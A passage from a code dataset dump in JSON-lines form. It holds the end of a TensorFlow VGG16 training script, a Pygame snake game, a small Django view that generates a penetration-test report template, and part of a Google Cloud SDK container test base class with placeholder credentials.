tf.keras.layers.experimental.preprocessing.Rescaling(1./255)\n normalized_train_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\n normalized_val_ds = val_ds.map(lambda x, y: (normalization_layer(x), y))\n #image_batch, labels_batch = next(iter(normalized_ds))\n\n # You could either manually tune this value, or set it to tf.data.AUTOTUNE, which will prompt the tf.data runtime to tune the value dynamically at runtime.\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n train_ds = normalized_train_ds.cache().prefetch(buffer_size=AUTOTUNE)\n val_ds = normalized_val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n # manual retrieval\n # for image_batch, labels_batch in train_ds:\n # print(image_batch.shape)\n # print(labels_batch.shape)\n # break\n\n #建立模型\n print (\"creating the model\")\n # conv_base=VGG16(weights=None,\n # \t\t\t\tinclude_top=False,\n # \t\t\t\tinput_shape=(224,224,3),\n # \t\t\t\t)\n\n conv_base = VGG16(weights=None, include_top=False, input_shape=(224,224,3),)\n print (\"base model created\")\n conv_base.trainable=True\n model= tf.keras.Sequential()\n model.add(conv_base)\n # flatten the input [1, 10, 64] ---> [640]\n model.add(Flatten())\n model.add(Dense(4096,activation=\"relu\"))\n model.add(Dropout(0.5))\n # layer 14\n model.add(Dense(4096, activation=\"relu\"))\n model.add(Dropout(0.5))\n # layer 15\n model.add(Dense(10,activation=\"softmax\"))\n model.summary()\n\n #编译模型\n print (\"compiling the model\")\n sgd = tf.keras.optimizers.SGD(learning_rate=0.05, momentum=0.0)\n Nadam = tf.keras.optimizers.Nadam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-07)\n adam = tf.keras.optimizers.Nadam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-07)\n loss=tf.losses.SparseCategoricalCrossentropy(from_logits=False)\n # using sparse_categorical_crossentropy because the label is in integer form, use categorical_crossentropy if in matrix form\n #model.compile(optimizer=adam,loss=loss,metrics=[\"accuracy\"])\n #print (\"model compilied\")\n\n # using sparse_categorical_crossentropy because the label is in integer form, use categorical_crossentropy if in matrix form\n model.compile(optimizer=adam,loss=loss,metrics=[\"accuracy\"])\n print (\"model compilied\")\n #训练模型\n model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=3\n )\n\n #评估模型\n test_loss,test_acc=model.evaluate(test_ds)\n print(\"The accuracy is:\"+str(test_acc))\nexcept RuntimeError as e:\n print(e)\n\n\n","sub_path":"vgg16_train_gpu.py","file_name":"vgg16_train_gpu.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534342766","text":"'''\nMiniSnake.py\n\nA game of snake in one .py file\n\n\nThis program by Daniel Westbrook\nwebsite: www.pixelatedawesome.com\nemail: thepixelator72@gmail.com\n\t (or whatever email I list on my site, if I stop using that one)\n\nLegal shit:\n\tCopyright (C) 2008 Daniel Westbrook\n\n\tThis program is free software: you can redistribute it and/or modify\n\tit under the terms of the GNU Lesser General Public License as published by\n\tthe Free Software Foundation, either version 3 of the License, or\n\t(at your option) any later version.\n\n\tThis program is distributed in the hope that it will be useful,\n\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n\tGNU Lesser General Public License for more details.\n\n\tYou should have received a copy of the GNU Lesser General Public License\n\talong with this program. If not, see .\n'''\nimport pygame\nfrom pygame.locals import *\nimport random\n\n# ---------- constants ---------- #\nSCREENSIZE = (800, 600)\nSCREENRECT = pygame.Rect(0, 0, SCREENSIZE[0], SCREENSIZE[1])\nCAPTION = 'MiniSnake'\nFPS = 40\n\nSTART_TILE = (20, 20)\nSTART_SEGMENTS = 7\n\nMOVE_RATE = 2\nDIFFICULTY_INCREASE_RATE = .05\nMOVE_THRESHOLD = 5 # when moverate counts up to this the snake moves\nBLOCK_SPAWN_RATE = 2\n\nTILE_SIZE = (10, 10)\nTILE_RECT = pygame.Rect(0, 0, TILE_SIZE[0], TILE_SIZE[1])\n\nSCREENTILES = ((SCREENSIZE[0] / TILE_SIZE[0]) - 1, (SCREENSIZE[1] / TILE_SIZE[1]) - 1)\n\nSNAKE_HEAD_RADIUS = 5\nSNAKE_SEGMENT_RADIUS = 4\nFOOD_RADIUS = 4\n\nBACKGROUND_COLOR = (255, 255, 255)\nSNAKE_HEAD_COLOR = (150, 0, 0)\nSNAKE_SEGMENT_COLOR = (255, 0, 0)\nFOOD_COLOR = (0, 255, 0)\nBLOCK_COLOR = (0, 0, 150)\nCOLORKEY_COLOR = (255, 255, 0)\n\nSCORE_COLOR = (0, 0, 0)\nSCORE_POS = (20, 20)\nSCORE_PREFIX = 'Score: '\n\nMOVE_VECTORS = {'left' : (-1, 0),\n\t\t\t\t'right' : (1, 0),\n\t\t\t\t'up' : (0, -1),\n\t\t\t\t'down' : (0, 1)\n\t\t\t\t}\nMOVE_VECTORS_PIXELS = {'left' : (-TILE_SIZE[0], 0),\n\t\t\t\t\t 'right' : (TILE_SIZE[0], 0),\n\t\t\t\t\t 'up' : (0, -TILE_SIZE[1]),\n\t\t\t\t\t 'down' : (0, TILE_SIZE[1])\n\t\t\t\t\t }\n\n\n# ----------- game objects ----------- #\nclass snake_segment(pygame.sprite.Sprite):\n\tdef __init__(self, tilepos, segment_groups, color = SNAKE_SEGMENT_COLOR, radius = SNAKE_SEGMENT_RADIUS):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = self.image = pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(COLORKEY_COLOR)\n\t\tself.image.set_colorkey(COLORKEY_COLOR)\n\t\tpygame.draw.circle(self.image, color, TILE_RECT.center, radius)\n\t\t\n\t\tself.tilepos = tilepos\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (tilepos[0] * TILE_SIZE[0], tilepos[1] * TILE_SIZE[1])\n\t\t\n\t\tself.segment_groups = segment_groups\n\t\tfor group in segment_groups:\n\t\t\tgroup.add(self)\n\t\t\n\t\tself.behind_segment = None\n\t\t\n\t\tself.movedir = 'left'\n\t\n\tdef add_segment(self):\n\t\tseg = self\n\t\twhile True:\n\t\t\tif seg.behind_segment == None:\n\t\t\t\tx = seg.tilepos[0]\n\t\t\t\ty = seg.tilepos[1]\n\t\t\t\tif seg.movedir == 'left':\n\t\t\t\t\tx += 1\n\t\t\t\telif seg.movedir == 'right':\n\t\t\t\t\tx -= 1\n\t\t\t\telif seg.movedir == 'up':\n\t\t\t\t\ty += 1\n\t\t\t\telif seg.movedir == 'down':\n\t\t\t\t\ty -= 1\n\t\t\t\tseg.behind_segment = snake_segment((x, y), seg.segment_groups)\n\t\t\t\tseg.behind_segment.movedir = seg.movedir\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tseg = seg.behind_segment\n\t\n\tdef update(self):\n\t\tpass\n\t\n\tdef move(self):\n\t\tself.tilepos = (self.tilepos[0] + MOVE_VECTORS[self.movedir][0], self.tilepos[1] + MOVE_VECTORS[self.movedir][1])\n\t\tself.rect.move_ip(MOVE_VECTORS_PIXELS[self.movedir])\n\t\tif self.behind_segment != None:\n\t\t\tself.behind_segment.move()\n\t\t\tself.behind_segment.movedir = self.movedir\n\nclass snake_head(snake_segment):\n\tdef __init__(self, tilepos, movedir, segment_groups):\n\t\tsnake_segment.__init__(self, tilepos, segment_groups, color = SNAKE_HEAD_COLOR, radius = SNAKE_HEAD_RADIUS)\n\t\tself.movedir = movedir\n\t\tself.movecount = 0\n\t\n\tdef update(self):\n\t\tself.movecount += MOVE_RATE\n\t\tif self.movecount > MOVE_THRESHOLD:\n\t\t\tself.move()\n\t\t\tself.movecount = 0\n\nclass food(pygame.sprite.Sprite):\n\tdef __init__(self, takenupgroup):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = self.image = pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(COLORKEY_COLOR)\n\t\tself.image.set_colorkey(COLORKEY_COLOR)\n\t\tpygame.draw.circle(self.image, FOOD_COLOR, TILE_RECT.center, FOOD_RADIUS)\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\twhile True:\n\t\t\tself.rect.topleft = (random.randint(0, SCREENTILES[0]) * TILE_SIZE[0], random.randint(0, SCREENTILES[1]) * TILE_SIZE[1])\n\t\t\tfor sprt in takenupgroup:\n\t\t\t\tif self.rect.colliderect(sprt):\n\t\t\t\t\tcontinue # collision, food cant go here\n\t\t\tbreak # no collision, food can go here\n\nclass block(pygame.sprite.Sprite):\n\tdef __init__(self, takenupgroup):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = self.image = pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(BLOCK_COLOR)\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\twhile True:\n\t\t\tself.rect.topleft = (random.randint(0, SCREENTILES[0]) * TILE_SIZE[0], random.randint(0, SCREENTILES[1]) * TILE_SIZE[1])\n\t\t\tfor sprt in takenupgroup:\n\t\t\t\tif self.rect.colliderect(sprt):\n\t\t\t\t\tcontinue # collision, food cant go here\n\t\t\tbreak # no collision, food can go here\n\n\n# -------------- game logic ------------ #\ndef main():\n\tpygame.init()\n\tscreen = pygame.display.set_mode(SCREENSIZE)\n\tpygame.display.set_caption(CAPTION)\n\tbg = pygame.Surface(SCREENSIZE).convert()\n\tbg.fill(BACKGROUND_COLOR)\n\tscreen.blit(bg, (0, 0))\n\t\n\tsnakegroup = pygame.sprite.Group()\n\tsnakeheadgroup = pygame.sprite.Group()\n\tfoodgroup = pygame.sprite.Group()\n\tblockgroup = pygame.sprite.Group()\n\ttakenupgroup = pygame.sprite.Group()\n\tall = pygame.sprite.RenderUpdates()\n\t\n\tsnake = snake_head(START_TILE, 'right', [snakegroup, all, takenupgroup])\n\tsnakeheadgroup.add(snake)\n\tfor index in range(START_SEGMENTS):\n\t\tsnake.add_segment()\n\t\n\tcurrentfood = 'no food'\n\t\n\tblock_frame = 0\n\t\n\tcurrentscore = 0\n\t\n\tpygame.display.flip()\n\t\n\t# mainloop\n\tquit = False\n\tclock = pygame.time.Clock()\n\tlose = False\n\twhile not quit:\n\t\t# events\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tquit = True\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tcurrentmovedir = snake.movedir\n\t\t\t\tif event.key == K_UP:\n\t\t\t\t\ttomove = 'up'\n\t\t\t\t\tdontmove = 'down'\n\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\ttomove = 'down'\n\t\t\t\t\tdontmove = 'up'\n\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\ttomove = 'left'\n\t\t\t\t\tdontmove = 'right'\n\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\ttomove = 'right'\n\t\t\t\t\tdontmove = 'left'\n\t\t\t\telse:\n\t\t\t\t\t#raise RuntimeError, 'not expected'\n\t\t\t\t\tpass\n\t\t\t\tif not currentmovedir == dontmove:\n\t\t\t\t\tsnake.movedir = tomove\n\t\t\n\t\t# clearing\n\t\tall.clear(screen, bg)\n\t\t\n\t\t# updates\n\t\tall.update()\n\t\t\n\t\tif currentfood == 'no food':\n\t\t\tcurrentfood = food(takenupgroup)\n\t\t\tfoodgroup.add(currentfood)\n\t\t\ttakenupgroup.add(currentfood)\n\t\t\tall.add(currentfood)\n\t\t\n\t\tpos = snake.rect.topleft\n\t\tif pos[0] < 0:\n\t\t\tquit = True\n\t\t\tlose = True\n\t\tif pos[0] >= SCREENSIZE[0]:\n\t\t\tquit = True\n\t\t\tlose = True\n\t\tif pos[1] < 0:\n\t\t\tquit = True\n\t\t\tlose = True\n\t\tif pos[1] >= SCREENSIZE[1]:\n\t\t\tquit = True\n\t\t\tlose = True\n\t\t\n\t\t# collisions\n\t\t# head -> tail\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, snakegroup, False, False)\n\t\tfor head in col:\n\t\t\tfor tail in col[head]:\n\t\t\t\tif not tail is snake:\n\t\t\t\t\tquit = True\n\t\t\t\t\tlose = True\n\t\t# head -> food\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, foodgroup, False, True)\n\t\tfor head in col:\n\t\t\tfor tail in col[head]:\n\t\t\t\tcurrentfood = 'no food'\n\t\t\t\tsnake.add_segment()\n\t\t\t\tcurrentscore += 1\n\t\t\t\tglobal MOVE_RATE, DIFFICULTY_INCREASE_RATE\n\t\t\t\tMOVE_RATE += DIFFICULTY_INCREASE_RATE\n\t\t\t\tblock_frame += 1\n\t\t\t\tif block_frame >= BLOCK_SPAWN_RATE:\n\t\t\t\t\tblock_frame = 0\n\t\t\t\t\tb = block(takenupgroup)\n\t\t\t\t\tblockgroup.add(b)\n\t\t\t\t\ttakenupgroup.add(b)\n\t\t\t\t\tall.add(b)\n\t\t# head -> blocks\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, blockgroup, False, False)\n\t\tfor head in col:\n\t\t\tfor collidedblock in col[head]:\n\t\t\t\tquit = True\n\t\t\t\tlose = True\n\t\t\n\t\t# score\n\t\td = screen.blit(bg, SCORE_POS, pygame.Rect(SCORE_POS, (50, 100)))\n\t\tf = pygame.font.Font(None, 12)\n\t\tscoreimage = f.render(SCORE_PREFIX + str(currentscore), True, SCORE_COLOR)\n\t\td2 = screen.blit(scoreimage, SCORE_POS)\n\t\t\n\t\t# drawing\n\t\tdirty = all.draw(screen)\n\t\tdirty.append(d)\n\t\tdirty.append(d2)\n\t\t\n\t\t# updating\n\t\tpygame.display.update(dirty)\n\t\t\n\t\t# waiting\n\t\tclock.tick(FPS)\n\t\n\t# game over\n\tif lose == True:\n\t\tf = pygame.font.Font(None, 300)\n\t\tfailmessage = f.render('FAIL', True, (0, 0, 0))\n\t\tfailrect = failmessage.get_rect()\n\t\tfailrect.center = SCREENRECT.center\n\t\tscreen.blit(failmessage, failrect)\n\t\tpygame.display.flip()\n\t\tpygame.time.wait(2000)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"snake/MiniSnake.py","file_name":"MiniSnake.py","file_ext":"py","file_size_in_byte":8583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610467761","text":"from django.shortcuts import render\nfrom docx import Document\nfrom .models import IMG\nfrom django.http import JsonResponse\n\ndef index(request):\n return render(request, 'form.html')\n\n\ndef img(request):\n return render(request, 'img.html')\n\n\ndef word_post(request):\n sqlinum=1\n if request.POST:\n print(request.POST)\n while request.POST.get('sqlino'+str(sqlinum)):\n sqlistrnum = str(sqlinum)\n print(request.POST.get('sqlino'+sqlistrnum))\n print(request.POST.get('sqliurl' + sqlistrnum))\n print(request.POST.get('sqlidesc' + sqlistrnum))\n for deltail in request.POST.getlist('sqli'+sqlistrnum):\n print(deltail)\n print(request.POST.get('sqliadv' + sqlistrnum))\n print(request.POST.get('sqlivuln' + sqlistrnum))\n sqlinum+=1\n document = Document()\n document.add_heading('渗透测试文档1', 0)\n #print(os.path.dirname(os.path.abspath(__file__)))\n #print(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n #document.add_picture(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"\\\\static\\\\upload\\\\\"+request.POST.get('cover-img'))\n document.add_page_break()\n document.save('渗透测试报告1.docx')\n return render(request, \"hello.html\")\n\n\ndef upload(request):\n imgname=[]\n if request.method == 'POST':\n for pic in request.FILES.getlist('file'):\n new_img = IMG(\n img=pic\n )\n imgname.append(pic.name)\n new_img.save()\n return JsonResponse({\"result\":imgname,\"msg\":\"成功\"})\n","sub_path":"PenetrationTemplate/generateReport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593917942","text":"# -*- coding: utf-8 -*- #\n# Copyright 2014 Google Inc. All Rights Reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Base classes for container tests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport datetime\nimport json\nimport os\n\nfrom apitools.base.py import encoding\nfrom apitools.base.py.testing import mock\nfrom dateutil import parser\nfrom dateutil import tz\nfrom googlecloudsdk.api_lib.container import api_adapter\nfrom googlecloudsdk.api_lib.container import kubeconfig as kconfig\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import base as calliope_base\nfrom googlecloudsdk.core import config as core_config\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core import resources\nfrom googlecloudsdk.core.util import files as file_utils\nfrom googlecloudsdk.core.util import platforms\nfrom googlecloudsdk.core.util import times\nfrom tests.lib import cli_test_base\nfrom tests.lib import e2e_base\nfrom tests.lib import sdk_test_base\nfrom tests.lib.apitools import http_error\n\n\nclass Error(Exception):\n pass\n\n\nclass UnexpectedCallException(Error):\n \"\"\"For unexpected calls to mocked functions.\"\"\"\n\nNOT_FOUND_ERROR = http_error.MakeHttpError(404, 'not found')\nUNAUTHORIZED_ERROR = http_error.MakeHttpError(403, 'unauthorized')\n\nFAKE_SDK_BIN_PATH = os.path.join('fake', 'bin', 'path')\n\n\ndef format_date_time(duration):\n \"\"\"Return RFC3339 string for datetime that is now + given duration.\n\n Args:\n duration: string ISO 8601 duration, e.g. 'P5D' for period 5 days.\n Returns:\n string timestamp\n \"\"\"\n # We use a format that preserves +00:00 for UTC to match timestamp format\n # returned by container API.\n fmt = '%Y-%m-%dT%H:%M:%S.%3f%Oz'\n return times.FormatDateTime(\n times.ParseDateTime(duration, tzinfo=times.UTC), fmt=fmt)\n\n\nclass UnitTestBase(cli_test_base.CliTestBase, sdk_test_base.WithFakeAuth):\n \"\"\"Base class for all Container tests.\"\"\"\n\n COMMAND_BASE = 'container'\n PASSWORD = 'test-password'\n CLUSTER_NAME = 'my-cluster'\n ZONE = 'us-central1-f'\n REGION = 'us-central1'\n PROJECT_ID = 'fake-project-id'\n PROJECT_REF = resources.REGISTRY.Create('container.projects',\n projectsId=PROJECT_ID)\n PROJECT_NUM = 123456789012\n NUM_NODES = 3\n AUTH_USER = 'admin'\n NODE_POOL_NAME = 'my-pool'\n OPERATION_TARGET = '/projects/{0}/zones/{1}/clusters/{2}'\n TARGET_LINK = 'https://container.googleapis.com/{0}/projects/{1}/zones/{2}/clusters/{3}' # pylint: disable=line-too-long\n NODE_POOL_TARGET_LINK = 'https://container.googleapis.com/{0}/projects/{1}/zones/{2}/clusters/{3}/nodePools/{4}' # pylint: disable=line-too-long\n MOCK_OPERATION_ID = 'operation-1414184316101-d4546dd2'\n MOCK_OPERATION_TARGET = OPERATION_TARGET.format(\n PROJECT_NUM, ZONE, CLUSTER_NAME)\n ENDPOINT = '130.211.191.49'\n VERSION = '1.8.0'\n INSTANCE_GROUP_URL = 'https://www.googleapis.com/compute/v1/projects/{0}/zones/{1}/instanceGroupManagers/gke-{2}-group' # pylint: disable=line-too-long\n\n def SetUp(self):\n self.MOCK_TARGET_LINK = self.TARGET_LINK.format( # pylint: disable=invalid-name\n self.API_VERSION, self.PROJECT_NUM, self.ZONE, self.CLUSTER_NAME)\n self.MOCK_NODE_POOL_TARGET_LINK = self.NODE_POOL_TARGET_LINK.format( # pylint: disable=invalid-name\n self.API_VERSION, self.PROJECT_NUM, self.ZONE,\n self.CLUSTER_NAME, self.NODE_POOL_NAME)\n properties.VALUES.core.project.Set(self.PROJECT_ID)\n self.mocked_client = mock.Client(\n core_apis.GetClientClass('container', self.API_VERSION),\n real_client=core_apis.GetClientInstance(\n 'container', self.API_VERSION, no_http=True))\n self.mocked_client.Mock()\n self.addCleanup(self.mocked_client.Unmock)\n\n self.mocked_compute_client_v1 = mock.Client(\n core_apis.GetClientClass('compute', 'v1'),\n real_client=core_apis.GetClientInstance('compute', 'v1', no_http=True))\n self.mocked_compute_client_v1.Mock()\n self.addCleanup(self.mocked_compute_client_v1.Unmock)\n\n # For faster tests\n self.StartPatch('time.sleep')\n\n # Set/unset envvars that affect kubeconfig behavior to avoid overwriting\n # actual files when running tests locally.\n self.tmp_home = file_utils.TemporaryDirectory()\n self.assertIsNotNone(self.tmp_home.path)\n self.StartDictPatch('os.environ', {'HOME': self.tmp_home.path})\n if os.environ.get('KUBECONFIG'):\n del os.environ['KUBECONFIG']\n\n def TearDown(self):\n self.tmp_home.Close()\n\n def Project(self):\n return None\n\n def _PatchSDKBinPath(self):\n fake_bin_path = self.StartPropertyPatch(core_config.Paths, 'sdk_bin_path')\n fake_bin_path.return_value = FAKE_SDK_BIN_PATH\n\n def _RunningCluster(self, **kwargs):\n return self._RunningClusterForVersion(self.VERSION, **kwargs)\n\n def _RunningClusterForVersion(self, version, **kwargs):\n name = kwargs.get('name', self.CLUSTER_NAME)\n defaults = {\n 'status': self.running,\n 'zone': kwargs.get('zone', self.ZONE),\n 'statusMessage': 'Running',\n 'endpoint': self.ENDPOINT,\n 'clusterApiVersion': version,\n 'currentMasterVersion': version,\n 'ca_data': 'fakecertificateauthoritydata',\n 'key_data': 'fakeclientkeydata',\n 'cert_data': 'fakeclientcertificatedata',\n 'currentNodeCount': self.NUM_NODES,\n 'currentNodeVersion': version,\n 'instanceGroupUrls': [self._MakeInstanceGroupUrl(self.PROJECT_ID,\n self.ZONE,\n name)],\n }\n defaults.update(kwargs)\n return self._MakeCluster(**defaults)\n\n def _RunningClusterWithNodePool(self, **kwargs):\n name = kwargs.get('name', self.CLUSTER_NAME)\n pool_name = kwargs.get('nodePoolName', self.NODE_POOL_NAME)\n zone = kwargs.get('zone', self.ZONE)\n defaults = {\n 'name': name,\n 'nodePoolName': pool_name,\n 'instanceGroupUrls': [self._MakeInstanceGroupUrl(self.PROJECT_ID,\n zone,\n name,\n pool_name)],\n }\n defaults.update(kwargs)\n return self._RunningCluster(**defaults)\n\n def _TestDefaultAuth(self, c_config):\n self._TestGcloudCredentials(c_config)\n\n def _TestGcloudCredentials(self, c_config):\n kubeconfig = kconfig.Kubeconfig.Default()\n self.assertIsNotNone(c_config)\n self.assertTrue(c_config.has_ca_cert)\n self.assertIsNotNone(c_config.auth_provider)\n self.assertEqual(c_config.auth_provider.get('name'), 'gcp')\n bin_name = 'gcloud'\n if platforms.OperatingSystem.IsWindows():\n bin_name = 'gcloud.cmd'\n self.assertDictEqual(\n kubeconfig.users[c_config.kube_context]['user']['auth-provider'],\n {\n 'name': 'gcp',\n 'config': {\n 'cmd-path': os.path.join(FAKE_SDK_BIN_PATH, bin_name),\n 'cmd-args': 'config config-helper --format=json',\n 'token-key': '{.credential.access_token}',\n 'expiry-key': '{.credential.token_expiry}',\n }\n })\n self.assertTrue(c_config.has_ca_cert)\n\n def _TestAppDefaultCredentials(self, c_config):\n kubeconfig = kconfig.Kubeconfig.Default()\n self.assertIsNotNone(c_config)\n self.assertTrue(c_config.has_ca_cert)\n self.assertIsNotNone(c_config.auth_provider)\n self.assertEqual(c_config.auth_provider.get('name'), 'gcp')\n self.assertDictEqual(\n kubeconfig.users[c_config.kube_context]['user']['auth-provider'],\n {'name': 'gcp'})\n self.assertTrue(c_config.has_ca_cert)\n\n\nclass TestBase(cli_test_base.CliTestBase):\n \"\"\"Mixin class for testing.\"\"\"\n\n def SetUp(self):\n self.messages = core_apis.GetMessagesModule('container', self.API_VERSION)\n self.compute_messages = core_apis.GetMessagesModule('compute', 'v1')\n self.op_delete = self.messages.Operation.OperationTypeValueValuesEnum.DELETE_CLUSTER # pylint: disable=line-too-long\n self.op_create = self.messages.Operation.OperationTypeValueValuesEnum.CREATE_CLUSTER # pylint: disable=line-too-long\n self.op_done = self.messages.Operation.StatusValueValuesEnum.DONE\n self.op_pending = self.messages.Operation.StatusValueValuesEnum.PENDING\n self.op_abort = self.messages.Operation.StatusValueValuesEnum.ABORTING\n self.op_upgrade_nodes = self.messages.Operation.OperationTypeValueValuesEnum.UPGRADE_NODES # pylint: disable=line-too-long\n self.op_upgrade_master = self.messages.Operation.OperationTypeValueValuesEnum.UPGRADE_MASTER # pylint: disable=line-too-long\n self.op_update_cluster = self.messages.Operation.OperationTypeValueValuesEnum.UPDATE_CLUSTER # pylint: disable=line-too-long\n self.op_set_master_auth = self.messages.Operation.OperationTypeValueValuesEnum.SET_MASTER_AUTH # pylint: disable=line-too-long\n self.op_set_labels = self.messages.Operation.OperationTypeValueValuesEnum.SET_LABELS # pylint: disable=line-too-long\n self.compute_op_done = self.compute_messages.Operation.StatusValueValuesEnum.DONE # pylint: disable=line-too-long\n self.compute_op_pending = self.compute_messages.Operation.StatusValueValuesEnum.PENDING # pylint: disable=line-too-long\n self.provisioning = self.messages.Cluster.StatusValueValuesEnum.PROVISIONING\n self.stopping = self.messages.Cluster.StatusValueValuesEnum.STOPPING\n self.running = self.messages.Cluster.StatusValueValuesEnum.RUNNING\n self.error = self.messages.Cluster.StatusValueValuesEnum.ERROR\n self.reconciling = self.messages.Cluster.StatusValueValuesEnum.RECONCILING\n self.degraded = self.messages.Cluster.StatusValueValuesEnum.DEGRADED\n self.action_set_password = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.SET_PASSWORD # pylint: disable=line-too-long\n self.action_generate_password = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.GENERATE_PASSWORD # pylint: disable=line-too-long\n self.action_set_username = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.SET_USERNAME # pylint: disable=line-too-long\n\n def _MakeCluster(self, **kwargs):\n # Construct the default pool, if we don't have any passed in. We\n # can't know all the possible permutations, so any tests involving\n # multiple nodepools must construct them prior to _MakeCluster.\n if kwargs.get('nodePools') is None:\n pool = self._MakeDefaultNodePool(**kwargs)\n kwargs['nodePools'] = [pool]\n kwargs['instanceGroupUrls'] = pool.instanceGroupUrls\n\n c = self.messages.Cluster(\n masterAuth=self.messages.MasterAuth(\n password=kwargs.get('password'),\n username=kwargs.get('username', self.AUTH_USER),\n clusterCaCertificate=kwargs.get('ca_data'),\n clientKey=kwargs.get('key_data'),\n clientCertificate=kwargs.get('cert_data'),\n clientCertificateConfig=self.messages.ClientCertificateConfig(\n issueClientCertificate=True,),\n ),\n name=kwargs.get('name', self.CLUSTER_NAME),\n currentNodeCount=kwargs.get('currentNodeCount'),\n initialNodeCount=kwargs.get('initialNodeCount'),\n locations=kwargs.get('locations', []),\n endpoint=kwargs.get('endpoint'),\n status=kwargs.get('status'),\n statusMessage=kwargs.get('statusMessage'),\n zone=kwargs.get('zone'),\n initialClusterVersion=kwargs.get('clusterApiVersion'),\n currentMasterVersion=kwargs.get('currentMasterVersion'),\n network=kwargs.get('network'),\n subnetwork=kwargs.get('subnetwork'),\n loggingService=kwargs.get('loggingService'),\n monitoringService=kwargs.get('monitoringService'),\n clusterIpv4Cidr=kwargs.get('clusterIpv4Cidr'),\n currentNodeVersion=kwargs.get('currentNodeVersion'),\n instanceGroupUrls=kwargs.get('instanceGroupUrls', []),\n addonsConfig=kwargs.get('addonsConfig'),\n nodePools=kwargs.get('nodePools'),\n nodeConfig=kwargs.get('nodeConfig'),\n enableKubernetesAlpha=kwargs.get('enableKubernetesAlpha'),\n expireTime=kwargs.get('expireTime'),\n selfLink=kwargs.get('selfLink'),\n masterAuthorizedNetworksConfig=kwargs.get('authorizedNetworks'),\n legacyAbac=kwargs.get('legacyAbac'),\n resourceLabels=kwargs.get('labels'),\n maintenancePolicy=kwargs.get('maintenancePolicy'),\n )\n if kwargs.get('conditions'):\n c.conditions.extend(kwargs.get('conditions'))\n return c\n\n def _MakeClusterWithAutoscaling(self, **kwargs):\n pool = self.messages.NodePool(\n autoscaling=kwargs.get('autoscaling')\n )\n kwargs['nodePools'] = [pool]\n return self._MakeCluster(**kwargs)\n\n def _MakeDefaultNodePool(self, **kwargs):\n pool_args = kwargs.copy()\n pool_args['name'] = kwargs.get('nodePoolName', 'default-pool')\n return self._MakeNodePool(**pool_args)\n\n def _MakeNodePool(self, **kwargs):\n return self.messages.NodePool(\n name=kwargs.get('name', self.NODE_POOL_NAME),\n version=kwargs.get('nodeVersion'),\n initialNodeCount=kwargs.get('initialNodeCount', self.NUM_NODES),\n config=self.messages.NodeConfig(\n diskSizeGb=kwargs.get('diskSizeGb'),\n diskType=kwargs.get('diskType'),\n machineType=kwargs.get('machineType'),\n oauthScopes=kwargs.get('oauthScopes', self._DEFAULT_SCOPES),\n localSsdCount=kwargs.get('localSsdCount'),\n tags=kwargs.get('tags', []),\n labels=kwargs.get('nodeLabels'),\n imageType=kwargs.get('imageType'),\n nodeImageConfig=kwargs.get('nodeImageConfig'),\n preemptible=kwargs.get('preemptible'),\n serviceAccount=kwargs.get('serviceAccount'),\n accelerators=kwargs.get('accelerators', []),\n minCpuPlatform=kwargs.get('minCpuPlatform'),\n taints=kwargs.get('nodeTaints', []),\n ),\n instanceGroupUrls=kwargs.get('instanceGroupUrls', []),\n autoscaling=kwargs.get('autoscaling'),\n management=kwargs.get('management'),\n )\n\n def _MakeIPAllocationPolicy(self, **kwargs):\n policy = self.messages.IPAllocationPolicy()\n if 'useIpAliases' in kwargs:\n policy.useIpAliases = kwargs['useIpAliases']\n if 'createSubnetwork' in kwargs:\n policy.createSubnetwork = kwargs['createSubnetwork']\n if 'subnetworkName' in kwargs:\n 